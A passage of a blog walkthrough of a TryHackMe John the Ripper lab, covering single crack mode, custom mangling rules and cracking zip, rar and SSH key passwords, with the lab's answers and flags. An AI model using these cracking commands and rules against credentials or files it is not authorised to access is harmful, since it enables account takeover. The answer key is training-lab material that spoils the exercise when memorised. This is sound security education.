    John's implementation of word mangling also features compatibility with the Gecos fields of the UNIX operating system, and other UNIX-like operating systems such as Linux. So what are Gecos? Remember in the last task where we were looking at the entries of both /etc/shadow and /etc/passwd? Well if you look closely You can see that each field is seperated by a colon ":". Each one of the fields that these records are split into are called Gecos fields. John can take information stored in those records, such as full name and home directory name to add in to the wordlist it generates when cracking /etc/shadow hashes with single crack mode.




    Using Single Crack Mode



    To use single crack mode, we use roughly the same syntax that we've used to so far, for example if we wanted to crack the password of the user named "Mike", using single mode, we'd use:


    john --single --format=[format] [path to file]


    --single - This flag lets john know you want to use the single hash cracking mode.



    Example Usage:


    john --single --format=raw-sha256 hashes.txt


    A Note on File Formats in Single Crack Mode:


    If you're cracking hashes in single crack mode, you need to change the file format that you're feeding john for it to understand what data to create a wordlist from. You do this by prepending the hash with the username that the hash belongs to, so according to the above example- we would change the file hashes.txt


    From:

    1efee03cdcb96d90ad48ccc7b8666033


    To

    mike:1efee03cdcb96d90ad48ccc7b8666033




    Practical



    Now you're familiar with the Syntax for John's single crack mode, download the attached hash and crack it, assuming that the user it belongs to is called "Joker".



    1) What is Joker's password?

    Ans :- jok3r










    Task 8 Custom Rules



    What are Custom Rules?


    As we journeyed through our exploration of what John can do in Single Crack Mode- you may have some ideas about what some good mangling patterns would be, or what patterns your passwords often use- that could be replicated with a certain mangling pattern. The good news is you can define your own sets of rules, which John will use to dynamically create passwords. This is especially useful when you know more information about the password structure of whatever your target is.




    Common Custom Rules


    Many organisations will require a certain level of password complexity to try and combat dictionary attacks, meaning that if you create an account somewhere, go to create a password and enter:

    polopassword




    You may receive a prompt telling you that passwords have to contain at least one of the following:


    •     Capital letter
    •     Number    
    •     Symbol     





    This is good! However, we can exploit the fact that most users will be predictable in the location of these symbols. For the above criteria, many users will use something like the following:


    Polopassword1!



    A password with the capital letter first, and a number followed by a symbol at the end. This pattern of the familiar password, appended and prepended by modifiers (such as the capital letter or symbols) is a memorable pattern that people will use, and reuse when they create passwords. This pattern can let us exploit password complexity predictability.



    Now this does meet the password complexity requirements, however as an attacker we can exploit the fact we know the likely position of these added elements to create dynamic passwords from our wordlists.




    How to create Custom Rules


    Custom rules are defined in the john.conf file, usually located in /etc/john/john.conf if you have installed John using a package manager or built from source with make and in /opt/john/john.conf on the TryHackMe Attackbox.

    Let's go over the syntax of these custom rules, using the example above as our target pattern. Note that there is a massive level of granular control that you can define in these rules, I would suggest taking a look at the wiki here in order to get a full view of the types of modifier you can use, as well as more examples of rule implementation.




    The first line:


    [List.Rules:THMRules] - Is used to define the name of your rule, this is what you will use to call your custom rule as a John argument.


    >


    We then use a regex style pattern match to define where in the word will be modified, again- we will only cover the basic and most common modifiers here:


    Az - Takes the word and appends it with the characters you define


    A0 - Takes the word and prepends it with the characters you define


    c - Capitalises the character positionally




    These can be used in combination to define where and what in the word you want to modify.


    Lastly, we then need to define what characters should be appended, prepended or otherwise included, we do this by adding character sets in square brackets [ ] in the order they should be used. These directly follow the modifier patterns inside of double quotes " ". Here are some common examples:



    [0-9] - Will include numbers 0-9


    [0] - Will include only the number 0



    [A-z] - Will include both upper and lowercase


    [A-Z] - Will include only uppercase letters


    [a-z] - Will include only lowercase letters


    [a] - Will include only a


    [!£$%@] - Will include the symbols !£$%@



    Putting this all together, in order to generate a wordlist from the rules that would match the example password "Polopassword1!" (assuming the word polopassword was in our wordlist) we would create a rule entry that looks like this:


    [List.Rules:PoloPassword]


    cAz"[0-9] [!£$%@]"



    In order to:


    Capitalise the first  letter - c


    Append to the end of the word - Az



    A number in the range 0-9 - [0-9]


    Followed by a symbol that is one of [!£$%@]





    Using Custom Rules


    We could then call this custom rule as a John argument using the  --rule=PoloPassword flag.

    As a full command: john --wordlist=[path to wordlist] --rule=PoloPassword [path to file]


    As a note I find it helpful to talk out the patterns if you're writing a rule- as shown above, the same applies to writing RegEx patterns too.

    Jumbo John already comes with a large list of custom rules, which contain modifiers for use almost all cases. If you get stuck, try looking at those rules [around line 678] if your syntax isn't working properly.




    Now, time for you to have a go!



    1) What do custom rules allow us to exploit?

    Ans :- password complexity predictability



    2)What rule would we use to add all capital letters to the end of the word?


    Ans :- Az"[A-Z]"



    3) What flag would we use to call a custom rule called "THMRules"

    Ans :- --rule=THMRULES





     

    Task 9 Cracking Password Protected Zip Files



    Cracking a Password Protected Zip File


    Yes! You read that right. We can use John to crack the password on password protected Zip files. Again, we're going to be using a separate part of the john suite of tools to convert the zip file into a format that John will understand, but for all intents and purposes, we're going to be using the syntax that you're already pretty familiar with by now.




    Zip2John



    Similarly to the unshadow tool that we used previously, we're going to be using the zip2john tool to convert the zip file into a hash format that John is able to understand, and hopefully crack. The basic usage is like this:



    zip2john [options] [zip file] > [output file]



    [options] - Allows you to pass specific checksum options to zip2john, this shouldn't often be necessary


    [zip file] - The path to the zip file you wish to get the hash of


    > - This is the output director, we're using this to send the output from this file to the...


    [output file] - This is the file that will store the output from




    Example Usage


    zip2john zipfile.zip > zip_hash.txt



    Cracking

    We're then able to take the file we output from zip2john in our example use case called "zip_hash.txt" and, as we did with unshadow, feed it directly into John as we have made the input specifically for it.


    john --wordlist=/usr/share/wordlists/rockyou.txt zip_hash.txt



    Practical

    Now have a go at cracking the attached "secure" zip file!



    1) What is the password for the secure.zip file?

    Ans :- pass123



     



     

    2)What is the contents of the flag inside the zip file?

    Ans :- THM{w3ll_d0n3_h4sh_r0y4l}







     


    Task 10 Cracking Password Protected RAR Archives



    Cracking a Password Protected RAR Archive


    We can use a similar process to the one we used in the last task to obtain the password for rar archives. If you aren't familiar, rar archives are compressed files created by the Winrar archive manager. Just like zip files they compress a wide variety of folders and files.




    Rar2John


    Almost identical to the zip2john tool that we just used, we're going to use the rar2john tool to convert the rar file into a hash format that John is able to understand. The basic syntax is as follows:


    rar2john [rar file] > [output file]


    rar2john - Invokes the rar2john tool


    [rar file] - The path to the rar file you wish to get the hash of


    > - This is the output director, we're using this to send the output from this file to the...
     

    [output file] - This is the file that will store the output from




    Example Usage


    rar2john rarfile.rar > rar_hash.txt




    Cracking

    Once again, we're then able to take the file we output from rar2john in our example use case called "rar_hash.txt" and, as we did with zip2john we can feed it directly into John..


    john --wordlist=/usr/share/wordlists/rockyou.txt rar_hash.txt




    Practical


    Now have a go at cracking the attached "secure" rar file!

    1) What is the password for the secure.rar file?


    Ans :- password




     

    2) What is the contents of the flag inside the zip file?

    Ans :- THM{r4r_4rch1ve5_th15_t1m3}











    Task 11 Cracking SSH Keys with John



    Cracking SSH Key Passwords


    Okay, okay I hear you, no more file archives! Fine! Let's explore one more use of John that comes up semi-frequently in CTF challenges. Using John to crack the SSH private key password of id_rsa files. Unless configured otherwise, you authenticate your SSH login using a password. However, you can configure key-based authentication, which lets you use your private key, id_rsa, as an authentication key to login to a remote machine over SSH. However, doing so will often require a password- here we will be using John to crack this password to allow authentication over SSH using the key.




    SSH2John



    Who could have guessed it, another conversion tool? Well, that's what working with John is all about. As the name suggests ssh2john converts the id_rsa private key that you use to login to the SSH session into a hash format that john can work with. Jokes aside, it's another beautiful example of John's versatility. The syntax is about what you'd expect. Note that if you don't have ssh2john installed, you can use ssh2john.py, which is located in the /opt/john/ssh2john.py. If you're doing this, replace the ssh2john command with python3 /opt/john/ssh2john.py.


    ssh2john [id_rsa private key file] > [output file]


    ssh2john - Invokes the ssh2john tool


    [id_rsa private key file] - The path to the id_rsa file you wish to get the hash of


    > - This is the output director, we're using this to send the output from this file to the...
     

    [output file] - This is the file that will store the output from



    Example Usage:


    ssh2john id_rsa > id_rsa_hash.txt




    Cracking


    For the final time, we're feeding the file we output from ssh2john, which in our example use case is called "id_rsa_hash.txt" and, as we did with rar2john we can use this seamlessly with John..


    john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash.txt



    Practical


    Now, I'd like you to crack the hash of the id_rsa file that's attached to this task!


    1) What is the SSH private key password?

    Ans :- mango




    I hope you've learnt a lot along the way. I'm sure by now you understand the basic principles and the pattern that there is to using John with even the most obscure supported hashes. I'd recommend checking out the Openwall Wiki here for more information about using John, and advice, updates or news about the tool.



    Disclaimer


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)



  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.